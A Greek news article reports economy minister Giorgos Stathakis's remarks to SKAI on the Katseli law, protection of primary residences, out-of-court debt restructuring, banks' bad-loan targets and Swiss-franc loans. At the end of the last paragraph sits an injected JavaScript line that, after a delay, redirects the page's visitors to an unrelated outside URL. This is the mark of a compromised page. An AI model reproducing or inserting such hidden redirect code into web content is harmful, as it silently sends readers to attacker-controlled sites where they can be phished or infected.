Σταθάκης: Με τις προϋποθέσεις του νόμου Κατσέλη η ρύθμιση για την α’ κατοικία

0
1

 

Ερωτηθείς για τις αποκαλύψεις Ολάντ περί τυπώματος δραχμών στη Ρωσία, αλλά και τη φημολογούμενη παρέμβαση του Μπιλ Κλίντον στον Τσίπρα για να υπάρξει συμφωνία με τους εταίρους, ο υπουργός Οοικονομίας Γιώργος Σταθάκης είπε ότι δεν έχει ενημέρωση δεν μπορεί να τοποθετηθεί και να κάνει κάποιο σχόλιο.

Μιλώντας στον ΣΚΑΙ, είπε πως η κυβέρνηση προωθεί εξωδικαστικό μηχανισμό αναδιάρθρωσης και επίλυσης των χρεών των επιχειρήσεων προς ασφαλιστικά ταμεία, δημόσιο και τράπεζες, για ενδεχόμενη μείωση του ύψους των χρεών τους εφόσον συμφωνεί η πλειονότητα των πιστωτών τους.

Σε ό,τι αφορά τα στεγαστικά δάνεια και τους πλειστηριασμούς, ο υπουργός διευκρίνισε ότι «όταν έχετε στεγαστικό με τον αναθεωρημένο νόμο Κατσέλη καλύπτεστε και για χρέη προς δημόσιο και για χρέη προς ασφαλιστικούς οργανισμούς ισχύει για όλες τις κατηγορίες δανείων. Αν δεν έχετε στεγαστικό δάνειο υπάρχει μικρό νομικό κενό, και συζητάμε πώς θα καλυφθεί» ανέφερε, ενώ διαβεβαίωσε πως υπάρχει δυνατότητα αλλαγών από την κυβέρνηση διαβεβαίωσε. Η ρύθμιση ισχύει μέχρι τέλους του 2018.

Ο Γιώργος Σταθάκης σημείωσε ότι υπάρχουν δυο κατηγορίες δανειοληπτών: αφενός τα νοικοκυριά, οι μισθωτοί και οι συνταξιούχοι, αφετέρου οι έμποροι – επιχειρηματίες οι οποίοι δεν εμπίπτουν στους προστατευτικούς νόμους, αλλά ανήκουν στον πτωχευτικό κώδικα. Ο κ. Σταθάκης δήλωσε ότι με κυβερνητική ρύθμιση απαγορεύεται η πώληση της πρώτης κατοικίας των εμπόρων – επιχειρηματιών σε funds.

Όπως ανέφερε ακόμη ο υπουργός, οι τράπεζες, από κοινού με τον Ενιαίο Εποπτικό Μηχανισμό (SSM), έθεσαν ως στόχο να απομειώσουν το 40% των κόκκινων δανείων τους έως το 2019, με κάθε τράπεζα να καλείται να εκπονήσει το δικό της πρόγραμμα. «Η κυβέρνηση παρακολουθεί το θέμα» τόνισε.

Για το δανεισμό σε ελβετικό φράγκο, χαρακτήρισε ως καλή σχετική απόφαση του Πρωτοδικείου η οποία πρέπει να επικυρωθεί νομικά και να γίνει δεσμευτική. Σημείωσε πάντως ότι πολλές ευρωπαϊκές χώρες έχουν το ίδιο πρόβλημα και δεν έχει εξευρεθεί ακόμη κοινή λύση για όλα τα κράτη – μέλη. «Η ΕΕ έβγαλε οδηγία ο συναλλαγματικός κίνδυνος να είναι προστατευμένος, αλλά από τούδε και στο εξής» διευκρίνισε ο κ. Σταθάκης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here